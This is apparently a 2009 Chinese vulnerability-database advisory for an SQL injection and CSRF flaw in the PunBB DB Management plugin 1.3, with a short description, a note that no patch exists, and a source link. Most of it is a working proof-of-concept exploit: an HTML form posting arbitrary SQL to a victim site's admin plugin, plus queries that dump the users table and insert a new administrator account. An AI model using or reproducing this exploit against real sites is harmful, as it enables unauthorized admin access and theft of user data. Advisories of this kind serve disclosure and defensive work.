PunBB DB Management插件SQL注入漏洞


添加时间:
2009-07-06

系统编号:
WAVDB-01456

影响版本:
PunBB DB Management Plugin 1.3

程序介绍:

PunBB是一款基于PHP的论坛程序。

漏洞分析:

PunBB的管理插件(AP_DB_management.php)没有正确地验证用户用户请求中所提交的多个参数,远程攻击者可以通过提交恶意的查询请求执行SQL注入攻击。


漏洞利用:

 
  1. <html>  
  2. <head>  
  3.     <title>[0-Day & Priv8] PunBB Administration Plug-In  
  4. (AP_DB_management.php) Remote SQL Injection CSRF Exploit By Dante90</title>  
  5. </head>  
  6. <body>  
  7.     <center><fieldset>  
  8.         <legend>Run SQL query</legend>  
  9.         <form name="Dante90" method="post" action="  
  10. http://www.victime_site.org/PunBB/admin_loader.php?plugin=AP_DB_management.php  
  11. ">  
  12.             <textarea name="this_query" rows="5" cols="50">  
  13.   
  14.             [SQL_Injection]  
  15.   
  16.             </textarea>  
  17.             <input type="submit" name="submit" value="Run query" />  
  18.         </form>  
  19.     </fieldset></center>  
  20. </body>  
  21. </html>  
  22.   
  23.   
  24. SELECT * FROM users WHERE id=2;  
  25.   
  26. SELECT * FROM users WHERE group_id=1;  
  27.   
  28. INSERT INTO users (group_id, username, password, email, num_posts,  
  29. registration_ip, last_visit) VALUES(1, '[NICK_NEW_ADMIN]',  
  30. 'md5("[PASSWORD_NEW_ADMIN]")', '[E-MAIL_NEW_ADMIN]', 1, '127.0.0.1',  
  31. '1220984516');  



解决方案:
厂商补丁:

PunBB
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.punbb.org/

信息来源:
<*来源:Dante90 (dante90.dmc4@hotmail.it)

链接:http://secunia.com/advisories/35595/
*>